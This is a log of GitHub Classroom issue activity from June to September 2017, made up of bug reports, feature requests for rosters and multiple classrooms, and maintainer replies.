[2017-06-28 17:24] wilfriedE opened #972 "Assign labels to assignments on initialization"
Label issues with a list of labels in the front matter.

As part of Milestone 1 in #937.

[2017-06-28 18:46] obcode commented on #448
@nwoodthorpe would it be possible to reuse a classroom in the next term with a new group of students or do I have to create a new one each time?

[2017-06-28 18:51] nwoodthorpe commented on #448
@obcode We're currently working on abstracting away assignment lists and other things from the classroom. This way, you can create a new classroom at the end of the semester and choose to re-use the list of assignments from a previous classroom. Would this solve your problem?

[2017-06-28 21:25] deepakkoirala opened #973 "Student email issue."
I have a student email id from my college that is deepak@mycollege.edu.np. So will this email be accepted for student pack ? As I have heard only it has to be .edu email but my email is .edu.np.

So how does it work ? It would help a lot.

[2017-06-28 21:39] johndbritton commented on #973
@deepakkoirala Issues on this repository are specifically for GitHub Classroom. You can contact us with your questions about the Student Developer Pack at https://education.github.com/contact.

[2017-06-28 21:39] #973 closed

[2017-06-28 21:50] johndbritton commented on #448
My only suggestion here is to use a different name for the `Student` class. `Student` implies that the object represents a human person, but the relationship you're suggesting is each `Student` can only be on one `Roster`. To avoid confusion consider renaming to `RosterEntry` or something else so that the concept is more clear.

[2017-06-28 21:59] nwoodthorpe commented on #448
:+1:, good point. I like `RosterEntry`

[2017-06-28 23:52] nwoodthorpe opened #974 "Unstyled textbox"
This textbox when accepting a group-assignment is unstyled. Also the submit button is kind of awkwardly right against the textbox. It should look the same as the textboxes in our other forms.

<img width="1051" alt="screen shot 2017-06-28 at 4 35 32 pm" src="https://user-images.githubusercontent.com/4149056/27665423-eab043a6-5c21-11e7-89c0-d6783a0c8193.png">

[2017-06-28 23:52] nwoodthorpe commented on #974
@anglinb could you take this on? I can't assign you since you aren't a contributor

[2017-06-29 04:38] anglinb commented on #974
@nwoodthorpe On it!

[2017-06-29 16:16] BelieveC commented on #730
I would like take this on

[2017-06-29 19:48] nwoodthorpe commented on #730
That would be great!

[2017-07-04 23:49] nwoodthorpe opened #986 "Rosters: Create Roster and RosterEntry model"
We can't have a roster if we don't have a Roster model 🐰

[2017-07-04 23:53] nwoodthorpe opened #987 "Rosters: Staffship 'make roster' step in classroom creation"
When creating a classroom, part of the setup should be optionally setting up a roster.

This will probably be split across a few PRs.

TODO: Talk to @mozzadrella about copy.

mock:
<img width="1077" alt="screen shot 2017-06-27 at 10 17 01 am" src="https://user-images.githubusercontent.com/4149056/27844646-1a873146-60d9-11e7-8c0b-806f230a1e10.png">

[2017-07-04 23:55] nwoodthorpe opened #988 "Rosters: Ship roster management UI"
Teachers with a roster will want to be able to manage it somehow.

This doesn't need to be "staffshipped" since it will only be accessable for classrooms with rosters, and we'll be staffshipping the creation of rosters.

Planned implementation: (https://github.com/education/classroom/issues/448#issuecomment-311516206)

[2017-07-04 23:58] nwoodthorpe opened #989 "Rosters: Ship new Assignment/show view"
https://github.com/education/classroom/issues/448#issuecomment-311516206

Assignment/show will need to be updated for classrooms that have a roster.

[2017-07-04 23:58] nwoodthorpe opened #990 "Rosters: Ship new GroupAssignment/show view"
https://github.com/education/classroom/issues/448#issuecomment-311516206

[2017-07-04 23:59] nwoodthorpe opened #991 "Rosters: Staffship a way for classrooms without a roster to create one"
https://github.com/education/classroom/issues/448#issuecomment-311516206

[2017-07-05 00:01] nwoodthorpe opened #992 "Rosters: FullShip everything"
Once everything in the Rosters project is done and we've done some user testing, we'll be ready to FULLSHIP this. This will be removing the feature flag check from both methods of creating a roster.

[2017-07-05 19:00] nwoodthorpe commented on #987
Note: We should be clear that the teacher should not ask for sensitive information like SSNs, because we can't store that stuff in our database.

[2017-07-05 21:00] nwoodthorpe opened #994 "Flash message is a bit less wide than it used to be"
It looks off not being the full width of the body below.

<img width="1043" alt="screen shot 2017-07-05 at 1 57 42 pm" src="https://user-images.githubusercontent.com/4149056/27884738-2c9b9906-618a-11e7-943b-974aa2d78c6d.png">

[2017-07-05 21:14] nwoodthorpe opened #995 "Mobile views are broken"
Not sure which commit we regressed, I thought we checked in the Primer bump.

Mobile views are all messed up, and they all have tons of blank space on the right if the user scrolls that way.

<img width="337" alt="screen shot 2017-07-05 at 2 12 10 pm" src="https://user-images.githubusercontent.com/4149056/27885247-29e1c4b8-618c-11e7-9479-ff997d6c6c5f.png">

<img width="338" alt="screen shot 2017-0

[2017-07-05 21:14] #986 closed

[2017-07-05 21:27] nwoodthorpe commented on #995
@wilfriedE `git bisect` shows it was Primer that introduced this. /classrooms looks fine, but all the other views are bad.

[code]

[2017-07-05 21:44] wilfriedE commented on #995
@nwoodthorpe , taking a 👀
Primer is also at version 8 now so I am going to submit a PR with these fixes.

[2017-07-05 22:01] nwoodthorpe commented on #995
8?? Wow. I'll make an issue to track the bump, we should do that soon™️ so we don't have to do 4 major version bumps when we want new features like we did with Primer 6.

[2017-07-05 22:02] nwoodthorpe commented on #995
I can tackle that if you're getting sick of front end :laughing: Just let me know

[2017-07-05 22:04] nwoodthorpe opened #996 "Upgrade Primer to version 8.0.0"
It might be worth waiting a bit incase bugs pop up, but we should make this upgrade soon so we don't end up having to do the crazy upgrade we did for Primer 6.

https://www.npmjs.com/package/primer-css

@tarebyte @wilfriedE

[2017-07-06 18:20] nwoodthorpe opened #998 "Lower half of "Manage Classroom" button isn't clickable"
When hovering over the lower half of the Manage Classroom button, the button does not work (both click events and hover styling)

[2017-07-07 10:11] fvanwijk commented on #960
✅

[2017-07-07 10:35] fvanwijk opened #1002 "Archiving individual assignments"
We are using Classroom to assess candidates for our company during the interview process. There is just one classroom with an assignment. The repos are private.

After the assessment has taken place, the candidate is accepted or rejected. After the interview we want to archive the individual assignment, because:
- We don't need the solution anymore except for reference
- We run out of private repo

[2017-07-07 13:06] mozzadrella commented on #1002
👋  hi @fvanwijk thanks for opening this issue.

We will consider archiving in the phase [of our roadmap](https://github.com/education/classroom/blob/master/ROADMAP.md) that addresses re-use and future prep.

[2017-07-10 15:34] hamishcunningham opened #1007 ""error during import" for student accepting assignment"
I set up an assignment, and (using an example student test account) accepted it. First I get:

"Your old project requires credentials for read-only access"

Then I enter my (test, i.e. student) credentials and get this:

"We found an error during import
We recommend restarting the import process, but if you are still having trouble contact support."

Any ideas?

Thanks!

[2017-07-10 19:17] hamishcunningham commented on #1007
This is caused by the repo being created under my ID, instead of under the organization ID...

[2017-07-10 19:17] #1007 closed

[2017-07-12 12:46] #987 closed

[2017-07-12 16:48] nwoodthorpe opened #1010 "Stafftools button misaligned"
The impersonate button is a little bugged out right now.

<img width="752" alt="screen shot 2017-07-12 at 9 44 45 am" src="https://user-images.githubusercontent.com/4149056/28129147-2d66468a-66e7-11e7-9d14-35ee63769cfe.png">

[2017-07-12 17:12] nwoodthorpe opened #1011 "Errored assignment repo displays incorrectly"
<img width="987" alt="screen shot 2017-07-12 at 10 04 23 am" src="https://user-images.githubusercontent.com/4149056/28130082-9a526492-66ea-11e7-8e74-c6d5d86bddc9.png">

[2017-07-12 17:59] #1011 closed

[2017-07-12 22:20] nwoodthorpe commented on #959
@mozzadrella

So now that our UI changes have shipped, I think we've addressed the main concerns. This is the new UI:

<img width="1072" alt="screen shot 2017-07-12 at 3 16 41 pm" src="https://user-images.githubusercontent.com/4149056/28142334-42279ff0-6715-11e7-8b91-35bb1d1a5d3e.png">

- We now show the number of commits
- We have a "View Repository" button that always brings the teacher to the l

[2017-07-13 15:34] hjmjohnson commented on #240
I too need an enterprise version of github classroom.

[2017-07-13 16:47] mozzadrella commented on #959
@nwoodthorpe I think it looks great--can't wait to share with teachers widely!

[2017-07-13 20:27] nwoodthorpe opened #1016 "Unit/integration specs for assignment editor"
A bug recently popped up that prevents us from clearing Deadlines using the edit form.

We should really build out a suite for the editor, it's pretty complex.

If no one else takes this on, I can do this next week.

[2017-07-14 15:26] #994 closed

[2017-07-14 20:38] wilfriedE opened #1019 "I18 Typos in stafftools/assignment_repos"
On the show page for assignment repos in stafftools the I18 changes are breaking because of typos.

[2017-07-15 18:23] arolson commented on #1010
@nwoodthorpe would you know how to replicate the issue?

[2017-07-15 18:35] nwoodthorpe commented on #1010
@arolson creating a new user, then viewing the stafftools page for that user should be sufficient. You'll need to make sure the user you're logged in as is set as an admin in your `.env`.

localhost:5200/stafftools/users/<user_id>

Just checked in prod, this hasn't been fixed yet.

[2017-07-15 18:40] arolson commented on #1010
Ok awesome I will take a look.

[2017-07-17 18:04] #988 closed

[2017-07-17 18:22] BelieveC commented on #1019
@wilfriedE, Please can add a screenshot of shown error.

[2017-07-17 20:12] #995 closed

[2017-07-17 20:13] #996 closed

[2017-07-17 20:35] wilfriedE commented on #1019
@BelieveC I no longer see this error so I am going to close the issue. If I spot it again, I'll reopen it with a screenshot.

[2017-07-17 20:35] #1019 closed

[2017-07-18 20:29] #998 closed

[2017-07-19 00:00] #991 closed

[2017-07-19 00:03] nwoodthorpe commented on #959
Going to close this, I think we've addressed the action items we pulled from this research. Thanks Vanessa!

[2017-07-19 00:03] #959 closed

[2017-07-19 01:00] pannirbr commented on #866
@ItsPugle  , what  the  teachers need tom pay  as it is not  clean discountes   can be  at no cost  as  written by you Teachers and schools must simply apply for an academic discount from GitHub Education, which provides the benefits of a paid GitHub organization plan at no cost.
This is an good investments  as  google  classroom is free for schools and teachers  , as  all startup need  crowd  to

[2017-07-19 21:14] #1010 closed

[2017-07-20 14:08] audrism commented on #960
:white_check_mark:

[2017-07-20 14:09] petros commented on #960
✅

[2017-07-20 14:09] rahuldave commented on #960
:white_check_mark:

[2017-07-20 14:27] jarrodparkes commented on #960
✅

[2017-07-20 14:43] oleks commented on #960
:white_check_mark:

[2017-07-20 16:21] drbyronw commented on #960
✅

[2017-07-20 18:02] radumg commented on #960
✅

[2017-07-20 18:07] rajeshkasturirangan commented on #960
:white_check_mark:

[2017-07-20 18:09] truongvc commented on #960
✅

[2017-07-20 18:32] jamesconnollylyit commented on #960
✅

[2017-07-20 18:38] amueller commented on #960
 
--

[2017-07-20 19:21] DebMDuke commented on #960
✅

[2017-07-20 20:00] johntfoster commented on #960
✅

[2017-07-20 20:07] treinartz commented on #960
:white_check_mark:

[2017-07-20 21:58] amalong commented on #960
✅

[2017-07-20 22:35] naupaka commented on #960
✅

[2017-07-20 23:52] hdsbbrooks commented on #960
:white_check_mark:

[2017-07-21 00:21] jeffutv commented on #960
✅

[2017-07-21 01:32] Auburngrads commented on #960
✅

[2017-07-21 02:10] poteus commented on #960
✅

[2017-07-21 03:49] madooei commented on #960
✅

[2017-07-21 05:52] pa7lux commented on #960
✅

[2017-07-21 06:10] csorbakristof commented on #960
:white_check_mark:

[2017-07-21 07:18] hahn commented on #960
:white_check_mark:

[2017-07-21 07:41] MattForshaw commented on #960
✅

[2017-07-21 10:52] ewan-klein commented on #960
✅

[2017-07-21 14:39] emtompsett commented on #960
✅

[2017-07-21 16:03] nwoodthorpe opened #1038 "Rosters: Line under tab nav should be full width"
re: https://github.com/education/classroom/pull/1037#issuecomment-316832680

[2017-07-21 16:36] Ms1Merchant commented on #960
:white_check_mark:

[2017-07-21 18:22] rcass commented on #960
✅

[2017-07-22 00:19] nwoodthorpe opened #1039 "Remove dependencyCI from readme"
@tarebyte I noticed we don't have dependencyCI in our commit statuses anymore. I forget if we talked about this. Is it coming back? If not, we should probably remove the badge from the Readme. it says we're failing! 😢

[2017-07-22 00:36] tarebyte commented on #1039
@nwoodthorpe we have a license issue with one of our dependencies, we should just remove this.

[2017-07-22 00:38] #1039 closed

[2017-07-22 06:19] simonhasan commented on #960
✅

[2017-07-22 16:13] mchugani commented on #960
✅

[2017-07-22 19:45] stephenhouser commented on #960
✅

[2017-07-23 00:41] gcschmit commented on #960
✅

[2017-07-23 22:23] nwoodthorpe commented on #441
It'd be nice to do this at some point. This would be a good first issue for anyone looking to contribute :)

[2017-07-24 03:56] akokcam commented on #960
✅

[2017-07-24 10:04] truonganhhoang commented on #960
✅

[2017-07-24 12:58] tritechsc commented on #960
![](https://assets-cdn.github.com/images/icons/emoji/unicode/2705.png)

[2017-07-24 14:49] keithmannock commented on #960
:white_check_mark:

[2017-07-24 18:17] #946 closed

[2017-07-24 22:28] nwoodthorpe commented on #379
This is now a feature in production!

[2017-07-24 22:28] #379 closed

[2017-07-25 08:33] arjenpdevries commented on #379
Thank you!

[2017-07-26 19:13] joelwross commented on #960
✅

[2017-07-26 19:44] danielandersson commented on #960
✅

[2017-07-27 00:09] nwoodthorpe commented on #1016
Closed by #1041

[2017-07-27 00:09] #1016 closed

[2017-07-27 01:02] nwoodthorpe commented on #935
Closing. If we decide to re-visit GraphQL we can reopen

[2017-07-27 01:02] #935 closed

[2017-07-27 01:02] nwoodthorpe commented on #934
Closing. If we decide to re-visit GraphQL we can reopen

[2017-07-27 01:02] #934 closed

[2017-07-27 01:02] nwoodthorpe commented on #933
Closing. If we decide to re-visit GraphQL we can reopen

[2017-07-27 01:02] #933 closed

[2017-07-27 01:03] nwoodthorpe commented on #931
Closing. If we decide to re-visit GraphQL we can reopen

[2017-07-27 01:03] #931 closed

[2017-07-27 01:04] #874 closed

[2017-07-27 01:06] nwoodthorpe commented on #909
It looks like this is related to an outdated Ruby version. Feel free to re-open if you have more info :)

[2017-07-27 01:06] #909 closed

[2017-07-27 01:06] nwoodthorpe commented on #919
@wilfriedE was this fixed?

[2017-07-27 01:15] nwoodthorpe commented on #783
This really isn't possible without `n` API requests. I'm not sure this is feasable for classroom right now.

[2017-07-27 01:15] #783 closed

[2017-07-27 01:20] nwoodthorpe commented on #853
This has been in production for a little bit!

[2017-07-27 01:20] #853 closed

[2017-07-27 01:21] #989 closed

[2017-07-27 15:06] nwoodthorpe opened #1044 "Rosters: Create roster by uploading CSV"
Note: in this context, a single column CSV and a newline seperated text file are the exact same thing.

[2017-07-27 15:41] nwoodthorpe opened #1046 "Rosters: Functionality to delete a roster"

[2017-07-28 16:25] nwoodthorpe commented on #1038
<img width="770" alt="screen shot 2017-07-28 at 9 24 38 am" src="https://user-images.githubusercontent.com/4149056/28726583-a463c212-7376-11e7-90c3-fcdbd4d3e712.png">

Thoughts on this layout? @tarebyte @jasonetco

[2017-07-28 16:30] nwoodthorpe commented on #1038
We could also change the "new student" button to be something like one of these examples, from the style guide

<img width="756" alt="screen shot 2017-07-28 at 9 30 12 am" src="https://user-images.githubusercontent.com/4149056/28726782-6e253946-7377-11e7-88df-f3f973a60823.png">

[2017-07-28 17:36] nwoodthorpe commented on #1044
Spent a bit of time thinking through how this should work:

Im thinking below the box for entering in entries manually, there can be a button labeled "OR upload a list of identifiers" or something similar. Clicking the button opens a file dialog. When they choose a file, we don't actually upload it to the server at all.

Instead, we use Javascript to open the file, parse out the identifiers (basic

[2017-07-28 20:46] #990 closed

[2017-07-28 23:38] parejajd opened #1049 "Multiple classroom in one organization"
is possible create two o more classroom in one organization?

I am obtain an error
![image](https://user-images.githubusercontent.com/3516716/28739832-f24933d4-73c3-11e7-87fa-8ad81083648a.png)

[2017-07-29 00:17] wilfriedE commented on #1049
Hi @parejajd this is currently not support, but it's something we have on our [roadmap](https://github.com/education/classroom/projects/7#card-3489110). Feel free to sign up to test out new features  #960.

[2017-07-29 00:25] parejajd commented on #960
✅

[2017-07-29 18:16] #1049 closed

[2017-07-31 04:45] jayvdb commented on #729
@nwoodthorpe , has this been done?

[2017-07-31 15:17] nwoodthorpe opened #1050 "Look into GitHub::Error occurances"
Starting on July 26th, 2017 at 02:00 PST, we've been getting GitHub::Error's bubbling all the way up. Probably something simple we regressed on.

Stack trace:

[code]

[2017-07-31 15:24] #1046 closed

[2017-07-31 15:49] bsoist commented on #960
✅

[2017-07-31 17:43] #1044 closed

[2017-07-31 23:13] wilfriedE commented on #919
Nope, but Docker implementation resolves this issue, I am going to close it.

[2017-07-31 23:13] #919 closed

[2017-08-01 23:23] nwoodthorpe commented on #922
This is happening because in `application.js`, we do:

[code]

and in `initializers/peek.rb`, we do:

[code]

The `peek/views/dalli` javascript throws exceptions if Dalli isn't included.

[2017-08-01 23:27] nwoodthorpe commented on #877
Thanks for the ideas @obcode

We'll definitely consider your two feature requests. In our current implementation, they don't exist, but they may soon.

We considered the "Have the user verify their email before joining the classroom" idea, but we decided against it. We don't want students to be unable to work on assignments because of technical issues. Instead, we've given teachers full control ov

[2017-08-01 23:27] #877 closed

[2017-08-02 15:33] #255 closed

[2017-08-03 00:14] #970 closed

[2017-08-03 18:17] nwoodthorpe commented on #1050
In `assignment::creator`, we call `verify_organization_has_private_repos_available!`. In the editor, though, we have no similar logic. The editor blindly sets `public_repo` to whatever the form says so,  then when we try to set the visibility of the assignment repo in `RepositoryVisibilityJob`, GitHub throws a 422.

[code]

[2017-08-04 20:30] nwoodthorpe commented on #922
There isn't a way to conditionally include the peek/views/dalli file as far as I can tell. It's not a big deal, it's only in development anyways.

[2017-08-04 20:30] #922 closed

[2017-08-04 20:55] #971 closed

[2017-08-04 20:55] #972 closed

[2017-08-05 00:08] #1050 closed

[2017-08-07 06:03] obcode opened #1063 "New assignment view shows max. 30 commits"
Refering to #989 is see the following issue:

All repositories with 30 **and more** commits will only be viewed to have 30 commits.

E.g.
![bildschirmfoto 2017-08-07 um 07 55 55](https://user-images.githubusercontent.com/281558/29013913-6fe00ca8-7b46-11e7-8569-e63d53b2ee75.png)

- innovativeTeamname: 42 commits
- jularo: 54 commits
- a: 71 commits
- fancy-team-42: 58 commits
- a-team: 47 commits
-

[2017-08-07 13:26] c4cheats commented on #595
Just wanted to voice my support for this feature as well.

[2017-08-07 14:54] nwoodthorpe commented on #1063
Oh interesting. The API must be paginating the request to 30 commits. I'll :eyes: this today, thanks!

[2017-08-07 18:39] nwoodthorpe commented on #448
This is now fully staffshipped. It will be full shipped soon, after some user testing.

Closing!

[2017-08-07 18:39] #448 closed

[2017-08-07 20:23] nwoodthorpe opened #1065 "Remove feature flag logic from Deadlines code"
Deadlines has been full-shipped for a little bit, no need to keep the feature flag code around, we aren't going back!

[2017-08-07 21:25] #1063 closed

[2017-08-08 01:20] #1065 closed

[2017-08-08 03:16] hongjiedai commented on #960
:white_check_mark:

[2017-08-08 06:57] obcode commented on #1063
👍  Thank's!!!

[2017-08-08 07:34] jayvdb commented on #729
I am still encountering this problem on private assignment creation.

[2017-08-08 19:49] nwoodthorpe commented on #729
I haven't seen this behavior before. I'll re-open and we'll try to get to this when we can!

[2017-08-08 19:50] Garylum commented on #595
I'd also like to voice support for multiple classrooms per org as well.  Another sticking point for us is the owner requirement to be able to admin a classroom.  We'd like to give each instructor admin rights to their class but not have to give them owner rights to our whole organization if possible

[2017-08-08 23:09] #974 closed

[2017-08-09 13:49] mozzadrella commented on #595
@Garylum @c4cheats thank you both for voicing your support, when we begin our next sprint this is part of the "Manage and Assess" theme we want to take on: https://github.com/education/classroom/milestone/5

[2017-08-09 14:29] ryansobol commented on #958
We're using the term "assessment" for all things assignmenty/exercisy. Just food for thought at this point.

[2017-08-09 14:38] ryansobol commented on #913
We include an automated test suite in all our assignment repositories. Running the suite allows both students and teachers to know how close a student is to completing the assignment.

However, we'd love to include a TravisCI badge at the top of the `README.md` file and a webhook for each student assignment. That way, our teachers wouldn't have to manually clone and run the test suite for each ass

[2017-08-09 15:40] nwoodthorpe opened #1071 "Deadlines in Stafftools"
Right now, the only way to lookup a deadline is via the console. I was trying to figure out why a certain `DeadlineJob` was crashing and had to pull it up in Heroku.

[2017-08-09 15:41] nwoodthorpe opened #1072 "DeadlineJob crashes if assignmentrepo has been deleted"
[code]

We need to handle the case where the repository doesn't exist anymore in `DeadlineJob`

[2017-08-09 16:35] nwoodthorpe opened #1073 "RepositoryEventJob not working"
All of the `Octokit::InvalidRepository: Invalid Repository. Use user/repo format.` errors we're getting in airbrake are from calling `.github_repository.<something>` methods on a repository that doesn't exist on GitHub anymore.

The `RepositoryEventJob` should be accepting hooks telling us that these repo's have been deleted, and destroying them on our end, but this doesn't seem to be happening.

[2017-08-09 16:38] nwoodthorpe commented on #913
Thanks for the feedback!

This is 100% a feature we're looking to implement at some point. It's on our roadmap, so once we find a bit of time, we'll get it done. We'll give you a shout when there's movement on this :)

[2017-08-09 17:59] nwoodthorpe commented on #1073
Looks like they're being enqueued, at least sometimes. Found this in the logs:

`[ActiveJob] Enqueued RepositoryEventJob (Job ID: f8f1ab8f-212f-4fc9-a0da-0e29d3ce778d) to Sidekiq(github_event)`

[2017-08-09 18:02] obcode commented on #913
@ryansobol if you have access to a Jenkins server, you can use Jenkinsfile with the Jenkins-GitHub-Plugin to automate the process.

[2017-08-09 23:26] #1071 closed

[2017-08-09 23:27] nwoodthorpe commented on #1073
Looks like this is working, it's just we don't get events for all repositories because of scope things. We're going to need to handle these cases :/

[2017-08-09 23:27] #1073 closed

[2017-08-09 23:54] nwoodthorpe opened #1075 "number_of_commits throws exceptions if the repo doesn't exist"
Similar to #1072, if the repo doesn't exist, we're throwing exceptions from `number_of_commits`

[code]

[2017-08-10 19:19] jfiksel opened #1078 "[Feature request] Add students as organization member after accepting first assignment"
Currently, if someone outside of the organization accepts a GitHub Classroom assignment, they are added as an "Outside collaborator". However, you have to manually invite them to make them an organization member. While this is better than entering each student's email in the organization invite box, it would be nice if students were automatically made organization members after accepting the first

[2017-08-10 20:53] tarebyte commented on #1078
@jfiksel to do our best to ensure that students can only see their own work we add students as an outside collaborator. We only add them to the org if we add them to the team guaranteeing that they can only see the repos they are supposed to through the team an nothing else.

I'd rather leave it as an outside collaborator but I'm happy to have a discussion about it if you think it would helpful 😄

[2017-08-10 21:12] jfiksel commented on #1078
I was under the impression that as long as long as the assignment repo is made private during the assignment creation process that each student will only be able to see their repo, regardless of whether they are a member or outside collaborator in the org. For my use case, I am thinking that since they are accepting an assignment, the organization they would be joining is presumably a classroom. I

[2017-08-12 23:03] Amirty commented on #960
very good
Thank you
[خرید ساعت دیواری](http://shopilan.ir/%d8%b3%d8%a7%d8%b9%d8%aa-%d8%af%db%8c%d9%88%d8%a7%d8%b1%db%8c-%d8%b7%d8%b1%d8%ad-%d8%b1%d9%87%d8%a7%d9%85/)

[2017-08-17 15:24] stevenoel opened #1079 "The repository Royalty already exists on this account"

[2017-08-17 15:24] #1079 closed

[2017-08-20 12:53] #879 closed

[2017-08-20 12:53] #662 closed

[2017-08-21 20:11] ghost opened #1080 "Hello"
https://classroom.github.com/g/fQrSlYuO

I created a team but used the wrong name.
Then I left the team, couldn't recreate one.
The team name was "=͟͟͞͞( •̀д•́) " (without ").
Plz fix it.

[2017-08-21 21:40] wilfriedE commented on #1080
Hi @nicksun79, you can resolve this by having your instructor/organization owner add you back to the "=͟͟͞͞( •̀д•́) " group. Your instructor can also change your group name. Let me know if this helps out.

[2017-08-22 13:35] #823 closed

[2017-08-22 18:58] #1080 closed

[2017-08-23 22:28] jaggy opened #1097 "Infinite OAuth redirect when signing up"
I tried signing up today and after authorizing the app, it sends me in this infinite loop of trying to authorize my account and redirecting to the classroom.

Here's a recording of the issue: http://d.pr/v/HeMN0S

I've also disabled all browser extensions, tried it on both Safari and Chrome.

Is there anything I'm missing?

[2017-08-24 01:12] malloc82 commented on #1097
Same problem here. My students cannot get authorized, it keeps going back to the authorization page. It was working yesterday.

[2017-08-24 01:50] milindkulkarni commented on #1097
Same issue here. Several of my students are getting what I assume is a variant of the same error, saying "This application has made an unusually high number of requests to access your account. Please reauthorize the application to continue."

[2017-08-24 02:10] tarebyte commented on #1097
@jaggy @malloc82 @milindkulkarni I deployed a fix for the redirect I think, mind giving it a look?

[2017-08-24 02:20] milindkulkarni commented on #1097
That seemed to fix part of the problem: I was able to log in with a test account and authorize Github Classroom successfully. But trying to set up the assignment with the assignment link still led me down a path of infinite redirects (Safari eventually stopped trying to load the page). Here's the assignment link that's causing the issue: https://classroom.github.com/g/fQrSlYuO

[2017-08-24 02:34] tarebyte commented on #1097
@milindkulkarni I'm not getting redirect on that link.

[2017-08-24 02:46] milindkulkarni commented on #1097
@tarebyte Seems to be working now! It must have been some weird caching issue on my side.

[2017-08-24 07:42] jaggy commented on #1097
Thank you! It's now working for me as well. <3

[2017-08-24 07:43] #1097 closed

[2017-08-24 07:44] korel-san opened #1104 "I didn't see all organizations in list when choose create new classroom"
![screenshot at 10-40-56](https://user-images.githubusercontent.com/946369/29655272-31d78ec4-88b9-11e7-88fe-f91ee82acd1f.png)
![screenshot at 10-40-28](https://user-images.githubusercontent.com/946369/29655273-31dc1534-88b9-11e7-96a1-4cd8bd207a32.png)

[2017-08-24 11:55] jfiksel commented on #1078
Adding on to this--one thing that would be great for classroom is that after giving access to Classroom, all members (not owners) are automatically part of of Student team. Anything that Classroom can do to reduce the administration of the class would be helpful. For example, if students accept an assignment before becoming members of the organization, they become Outside Collaborators. We then ha

[2017-08-24 13:59] wilfriedE commented on #1104
Hi @korel-san, have you tried the ProTip (at the bottom of the second screenshot)?

[2017-08-25 10:47] BrianEmilius opened #1105 "No option to add/edit classroom student roster"
I watched the [GIF](https://github.com/blog/2418-github-classroom-now-supports-deadlines-and-class-rosters) that shows how to add and manage classroom student rosters, but when I am in a classroom of my own, I cannot find any options to manage roster as shown in the GIF.

[2017-08-25 11:56] tarebyte commented on #1105
@BrianEmilius it seems as though the gif is missing a step or two 😄

For anyone who comes along this issue, I'm going to go through the entire flow.

# Step 1
On your classrooms home page click on an existing Classroom.

<img width="1040" alt="screen shot 2017-08-25 at 07 50 37" src="https://user-images.githubusercontent.com/564113/29712957-5bee1082-896a-11e7-9322-81b807916721.png">

# Step 2
On t

[2017-08-25 11:59] BrianEmilius commented on #1105
Ypu, it's the roster management link that I don't have.

[2017-08-25 12:04] tarebyte commented on #1105
@BrianEmilius that's my bad, I thought we had turned on the feature flag for everyone.

[2017-08-25 12:46] BrianEmilius commented on #1105
No worries, I'm just happy we figured it out :)
Thanks for the reply!

[2017-08-25 19:42] daibhin commented on #441
Took this on as my first contribution in https://github.com/education/classroom/pull/1106. Let me know if it needs work :)

[2017-08-26 00:06] prismspecs opened #1107 "roster system totally broken or doesn't make sense"
Can't find any info on how to add a student. Also in the video it said we would be able to just give students a link and have them join via that portal, but how? Nothing seems to work, and populating the roster fields with info yields very strange results

[2017-08-26 00:16] nag92 opened #1108 "Get Warning icons over student team"
When I try to see all my student repos I sometimes get warning icons over the names.
If I refresh the page they will go away for some but appear on others.
![image](https://user-images.githubusercontent.com/7646872/29736726-12b17f40-89d2-11e7-9154-6d17d7697a49.png)

[2017-08-26 14:14] #1105 closed

[2017-08-26 21:44] nag92 commented on #851
I am having similar issues. Some of my studets are having trouble creating and joining teams.

[2017-08-27 13:01] #848 closed

[2017-08-28 17:24] sanicki commented on #1107
@prismspecs Please let me know if you've already watched all three Getting Started videos found at https://classroom.github.com/videos.

[2017-08-28 18:31] Wanchaloe commented on #1072
NStratis
Stratis.Bitcoin.Tests/Wallet/HdAccountTest.cs
Stratis.Bitcoin.Tests/Wallet/HdAddressTest.cs
Stratis.Bitcoin.Tests/Wallet/WalletManagerTest.cs
Stratis.Bitcoin/Features/Wallet/HdOperations.cs
Stratis.Bitcoin/Features/Wallet/IWalletManager.cs
Stratis.Bitcoin/Features/Wallet/Wallet.cs
Stratis.Bitcoin/Features/Wallet/WalletMana

[2017-08-29 14:18] #830 closed

[2017-08-29 14:18] #875 closed

[2017-08-29 14:18] #772 closed

[2017-08-29 19:28] anilmndl commented on #677
I think this is still an issue. When I try to access the assignment page, I get 500 error.

https://classroom.github.com/classrooms/xxxx-xxx/assignments/example-assignment

[2017-08-29 21:05] msraunak commented on #595
I would like to also voice my support for multiple classrooms per organization. I will be teaching three different courses this Fall and I plan to use Github classroom in all three courses. It will be a whole lot more convenient to have all three classes under one organization.

[2017-08-30 12:50] yasinS commented on #960
✅

[2017-08-30 17:32] zingale opened #1116 "following assignment link fails to create repo"
I've create a simple test repo in my classroom 31287650-phy-604-stony-brook-university

when I create a simple test assignment with a single line README, and then follow the invitation link myself.  The import never finishes.  How can I actually make the link work to create a working repo?

[2017-08-30 17:33] zingale commented on #1116
update: it finished after about 20 minutes.  Is that normal for a simple repo like this?  Should I warn students that they may have to wait 30 minutes or more from following a link until the repo is created?

[2017-08-31 20:23] readoc commented on #595
I'm all for this as well. I would rather keep all classes under one organization if possible. So, +1

[2017-08-31 21:44] gkapfham opened #1117 "Internal Server Error 500 When Accessing an Assignment in GitHub Classroom"
Hello! Thank you so much for developing GitHub Classroom. So far, my students and I have really enjoyed using the system. In advance of running the laboratory session today, I have tested it repeatedly with small class sizes for our first laboratory assignment and everything always worked correctly.

That is, it was possible to:

- Instructor: Create an organization for the class
- Instructor: Con

[2017-09-01 07:34] Badlapje commented on #595
I definitely support this.

From a UX point of view, i find the current structure to be very unclear, as you're using the term organization to mean course.  From an administrative point of view, you've created quite a bit of overhead. Right now i need to create an organization not only for each course, but also for each class in that course.  I teach 10 courses / year.  If i want to put all of the

[2017-09-01 07:43] Badlapje commented on #595
@tarebyte you mention we can help with the implementation of this feature?  Can you direct me to the correct repo to do that @?  I would be very happy to help with that.

[2017-09-01 16:03] kohler opened #1118 "Failure accepting an assignment"
Hi, I run a class (organization `cs61`) using GitHub Classroom; thanks!

Last year things worked OK, with some small glitches. The problem is that this year, students cannot seem to accept assignments.

Classroom link: https://classroom.github.com/classrooms/2374024-harvard-cs61

Here's my workflow so far.
* I reset the state of the base repository for problem sets, `cs61/cs61-psets`. I prefer to

[2017-09-01 16:11] minneapolis-edu commented on #1117
I believe I have the same issue.

I have a 500 error on one of my assignments; it's also the first assignment ([here](https://classroom.github.com/classrooms/14797930-mctc-itec-java/assignments/assignment-1-variables-and-conditional-statements)) in my classroom.

Wondering if it may be related to creating a class roster?
The assignment was initially working fine, I shared the link, students create

[2017-09-01 19:43] angrave opened #1120 "Easily Late bulk-add multiple students to a class"
As a teacher for large enrollment (N>200) classes I need a mechanism to upload a new roster file or late add more than one student at a time.
roster#new-student-modal
